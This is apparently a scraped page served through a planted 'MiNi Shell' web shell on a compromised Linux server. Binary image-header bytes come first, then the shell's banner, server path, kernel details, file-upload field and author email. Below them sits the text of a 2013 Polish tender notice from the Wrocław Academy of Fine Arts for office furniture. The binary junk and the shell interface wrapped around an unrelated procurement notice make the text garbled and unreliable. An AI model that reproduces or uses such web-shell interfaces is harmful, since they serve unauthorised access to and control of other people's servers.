JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130508/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130508/69299-N-2013.html

<p class="kh_header"><b>Wrocław: DOSTAWA MEBLI
znak sprawy: ZP-7/05/2013</b><br>
<b>Numer ogłoszenia: 69299 - 2013; data zamieszczenia: 08.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu , pl. Polski 3/4, 50-156 Wrocław, woj. dolnośląskie, tel. 071 3438031 w. 233, faks 071 3431558.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.asp.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA MEBLI
znak sprawy: ZP-7/05/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) SZAFA METALOWA DWUDRZWIOWA Szafa metalowa dwudrzwiowa wzmacniana - atestowana  do przechowywania dokumentów i materiałów niejawnych, oznaczonych klauzulą poufne. Przeznaczone dla pomieszczeń biurowych i archiwów. Dostosowane do przechowywania ważnych dokumentów, akt osobowych, a także sprzętu komputerowego. Konstrukcja  z blachy stalowej o zwiększonej wytrzymałości, nadającej odpowiednią sztywność. -  Skonstruowane ze stali o podwyższonej wytrzymałości, nadającej odpowiednią sztywność oraz zabezpieczonej przed korozją.
1.System 6 ruchomych rygli (4 poziomych i 2 pionowych), mechanizm ryglujący uruchamia się obrotową klamką i blokuje zamkiem. 2. Mechanizm ryglowy blokujący drzwi szafy na trzech krawędziach. Zawiasy wewnętrzne. Kąt otwarcia drzwi powinien wynosić 120 stopni. 3.Atestowany zamek kluczowy klasy A, zabezpieczony przed działaniem destrukcyjnym, w tym przed przewierceniem. 4. Wyposażona w sztywne półki o maksymalnym obciążeniu do 50 kg
5.Pomalowana farbą proszkową. 6.Kolor jasno-popielaty. 7. 4 półki z możliwością regulacji zawieszenia. Wymiary zewnętrzne:   wys. - 200mm  , szer. - 1200mm, głęb. - 500mm  , +- 20 mm    
waga - do 110 kg - 1szt.
2) SZAFA NA GRAFIKI  5-szuflad A0-5 PIĘCIOSZUFLADOWA  SZAFA przystosowana do przechowywania grafik, rysunków oraz montaży poligraficznych do formatu A-0.        
1. Maksymalny format A-0.2. Wykonana z blachy o grubości 1,0 - 2,0mm    3. Pomalowana farbami proszkowymi - epoksydowo-poliestrowymi w kolorze RAL 9003. 4. Szuflady przesuwane po metalowych łożyskach lub 4 rolkach polipropylenowych z blokadą zabezpieczającą przed wypadnięciem. 5. Udźwig 1 szuflady 80 kg. 6. Uchwyt na całej długości szuflady.
6. Całość zamykana jednym centralnym zamkiem.  Wymiary zewnętrzne szafy: szerokość - 1510mm, głębokość - 940mm, wysokość - 416mm
wymiary użytkowe szuflady:  szerokość - 1400mm, głębokość - 900mm, wysokość - 55mm  Waga szafy do 135kg -2szt.
3) KONTENER BIUROWY Kontener z 4 szuflada- mi wykonany z blachy stalowej lakierowanej proszkowo w kolorze RAL 9003. Kółka wykonane z czarnego tworzywa wyposażone w hamulce. Centralne zamykanie szuflad. Szuflada wyposażona w organizer (piórnik). Waga do 15kg.40x56x58cm-2szt.
4) KRZESŁO audytoryjne na czterech nogach, stelaż krzesła wykonany z profilu stalowego o przekroju okrągłym o wymiarach 22x1,5 mm, chromowany, zakończony stopkami, z tworzywa sztucznego. Połączenia spawane stelaża wykonane z dużą starannością z wykorzystaniem technologii TIG, co gwarantuje brak pogrubienia stelaża w miejscu spawu oraz wysoką trwałość połączeń. Krzesło sztaplowane. Oparcie krzesła mocowane do stelaża stalowego za pośrednictwem aluminiowego łącznika w kolorze chrom wpuszczonego w pionową rurkę stelaża podtrzymującą oparcie krzesła, z którego jest wyprowadzony pręt stalowy o średnicy 8 mm, wpuszczony bezpośrednio w sklejkę oparcia krzesła. System ten zapewnia wysoką trwałość oraz sprężystość połączenia oparcia krzesła ze stelażem. Siedzisko krzesła wykonane ze sklejki drewna liściastego w kolorze naturalnego buku, lakierowanej lakierem bezbarwnym, w kształcie trapezu, z wywiniętą ku dołowi przednią krawędzią siedziska, powierzchnia robocza siedziska z sferycznymi wytłoczeniami powierzchni. Oparcie krzesła wykonane ze sklejki drewna liściastego w kolorze naturalnego buku, lakierowane lakierem bezbarwnym, o wyraźnie zmiennej się grubości sklejki od boków do środka oparcia. wysokość całkowita: 805mm, wysokość siedziska: 450mm, głębokość siedziska: 460mm, szerokość podstawy: 476mm, głębokość całkowita: 540mm-12szt.
5) WÓZEK NA KOMPUTER NR Kolor wózka - ustalony z użytkownikiem na podstawie próbek. (dostawa Pl. Polski 3-4 - I piętro, pok. 103M)-1szt.1
6) SZAFKA Z SZUFLADAMI Szafka z 5 szufladami na regulowanych nóżkach - w tym piórnik. Blat wykonany z płyty wiórowej laminowanej o gr. 25 mm, pozostałe elementy wykonane z płyty wiórowej laminowanej o gr. 18 mm. Krawędzie blatu oklejone obrzeżem PCV o gr. 2mm. Szerokość 40cm,  głębokość 85cm, wysokość 74cm. UWAGA:  szuflady zamykane na klucz  wyposażonych w patentowy zamek centralny + zapasowy klucz. Górna szuflada - piórnik. Uchwyty metalowe 2-punktowe.  Kolor szafki - ustalony z użytkownikiem na podstawie próbek. Dostawa Pl. Polski 3-4 - I piętro, pok. 103M-1szt.
7) REGAŁ na książki: rozmiar: 80x28x202cm, grubość płyty: 1,8 - 2 cm, okleina brzozowa, regulowane półki, możliwość dopasowania  przestrzeni między półkami do własnych potrzeb. Części główne: Płyta wiórowa, okleina brzozowa, Bezbarwny lakier akrylowy Panel spodni - Cokół frontowy: Płyta wiórowa, okleina brzozowa, folia, Bezbarwny lakier akrylowy Panel tylny: Płyta pilśniowa, folia Tył: płyta pilśniowa twarda z nadrukiem-2szt.
8) BIURKO NR 1 kolor buk - wg próbnika, blat biurka wykonany z płyty melaminowej  o grubości 28mm, krawędzie zabezpieczone 2-milimetrowym obrzeżem PVC w kolorze blatu, przelot kablowy o średnicy 60 mm, wymiary techniczne wynoszą: długość[cm] 160 głębokość[cm] 100: 70 cm tam, gdzie wcięcie, długość odcinka od końca pod kątem prostym to 50 cm, całe wycięcie odbywa się na długości 110 cm, wysokość[cm]75-1szt.
9) REGAŁ GABINETOWY kolor buk - wg próbnika, płyta melaminowa o grubości 28 mm zabezpieczona 2-milimetrową warstwą PVC w kolorze płyty, regał wyposażony w 5 powierzchni segregatorowych. Dolna część zakryta jest drzwiczkami z zamkiem oraz metalowymi, satynowanymi uchwytami. Półki mocowane są za pomocą złączy. Regulacji podlega poziom regału, dzięki czemu można go ustawiać na nierównych powierzchniach lub komponować z innymi meblami w jednej linii. Wymiary: szerokość [cm] 80, wysokość [cm] 183, głębokość [cm] 38-1szt.
10) SZAFA NR 1	Dwudrzwiowa szafa wyposażona w 6 powierzchni segregatorowych w równych odległościach, posiadająca wbudowany zamek patentowy, złącza, satynowane metalowe uchwyty, wykonana z płyty melaminowej o grubości 28 mm, 2-milimetrowej warstwy PVC, kolor buk wg próbnika. Wymiary: wysokość [cm] 218, szerokość [cm] 80, głębokość [cm] 38-1szt.
11) SZAFA NR 2 Szafa gabinetowa wykonana z płyty melaminowej o grubości 28 mm, kolor buk - wg próbnika. Tył szafy zbudowany z płyty HDF. Szafa posiada drzwiczki z zamkiem i metalowymi, satynowymi uchwytami. Z lewej strony zawiera 5 półek na akta, natomiast z prawej znajduje się część ubraniowa z drążkiem na ubrania. Wymiary: Wysokość [cm] 218,Szerokość [cm] 80,Głębokość [cm] 38-1szt.

12) KRZESŁO kolor ramy - czarny, kolor siedziska i oparcia - granatowy, siedzisko i oparcie wykonane z tkaniny z grubym, trwałym splotem (tkanina typu C),wymiary techniczne wynoszą:
wysokość oparcia [cm] 35, wysokość siedziska [cm] 47, szerokość siedziska [cm]47 
głębokość siedziska [cm]41, wysokość całkowita [cm] 82-2szt.
13) BIURKO Z SZUFLADĄ NA KLAWIATURĘ Biurko narożne Blat wykonany z płyty wiórowej laminowanej o gr. 25 mm, pozostałe elementy wykonane z płyty wiórowej laminowanej o gr. 18 mm. Krawędzie blatu i wysuwanej półki (szuflady) na klawiaturę oklejone obrzeżem PCV o gr. 2mm. Blenda do wysokości 3-4 biurka, wykonana z płyty wiórowej laminowanej o gr. 18 mm. W rogu biurka mają być przepusty kablowe. Kolor biurka - ustalony z użytkownikiem  na podstawie próbek. WYMIARY:  Strona prawa biurka: szer. 120 x gł. 60 cm, Strona lewa biurka: szer. 160 x gł. 80 cm, wysokość biurka 74-75 cm. Szuflada na klawiaturę przykręca pod blatem biurka.  Wymiary szuflady na klawiaturę jak na rysunku +- 2cm-2szt.
14) KONTENER NR 1 Kontener na kółkach do ustawiania pod lub obok biurka.
Trzy szuflady zamykane zamkiem centralnym. Blat  o grubości 25 mm.-1szt.
15) KONTENER NR 2 Kontener 3 - szufladowy z piórnikiem i zamkiem centralnym, na kółkach wykonany z płyty 18 mm oklejony obrzeżem PCV 0,6 mm, blat wykonany z płyty 25 mm. Wymiary jak kontener nr 1.-1szt.
16) WÓZEK NA KOMPUTER NR 2 Wózek na komputer z takiej samej płyty jak biurko z poz. 13. Wymiary: szer. 24 cm, gł. 50 cm.-1szt.
17) FOTEL OBROTOWY Fotel obrotowy, ergonomiczny, wyprofilowane oparcie, tapicerowany. Plastikowe podłokietniki. Regulacja wysokości siedziska za pomocą podnośnika pneumatycznego oraz mechanizm ruchowy. Nylonowa podstawa jezdna. Ruchome siedzisko i oparcie z możliwością blokady w pozycji do pracy. Samohamowne kółka. Uwaga:  Kolor czarny. wymiary - wskazane na rysunku-6szt..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.13.00.00-2, 39.12.10.00-6, 39.14.13.00-5, 39.11.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień.
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. 
W celu wykazania spełnienia przez Wykonawcę warunku Zamawiający żąda załączenia do oferty oświadczenia, Wykonawcy o spełnieniu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp. - złącznik nr 3 do SIWZ. 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganego oświadczenia, według formuły: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Formularz oferty (załącznik nr 1 do SIWZ).
2)	Formularz asortymentowo-cenowy  (załącznik nr 2 do SIWZ).
3)	Lista podmiotów należących do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów albo informacja o tym, że Wykonawca nie należy do grupy kapitałowej (załącznik nr 4 do SIWZ).
4)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów, na okres korzystania z nich przy wykonywaniu zamówienia, jeżeli Wykonawca polegać będzie na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.
5)	Dokument, z którego wynika upoważnienie Wykonawcy do podpisywania oferty lub pełnomocnictwo do reprezentowania Wykonawcy jeżeli ofertę składa pełnomocnik, a prawo do podpisania oferty nie wynika z innych dokumentów do niej załączonych.
6)	W przypadku złożenia oferty wspólnej przez kilku Wykonawców należy przedstawić pełnomocnictwo ustanawiające pełnomocnika do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu o udzielenie niniejszego zamówienia i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby pełnomocnikiem był jeden z Wykonawców składających ofertę wspólną (Partnerów). Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Partnerów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.asp.wroc.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław
pokój 217 II piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2013 godzina 10:00, miejsce: Akademia Sztuk Pięknych im. Eugeniusza Gepperta we Wrocławiu, 
Pl. Polski 3/4, 50-156 Wrocław, 
sekretariat Kanclerza (pok. 107, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com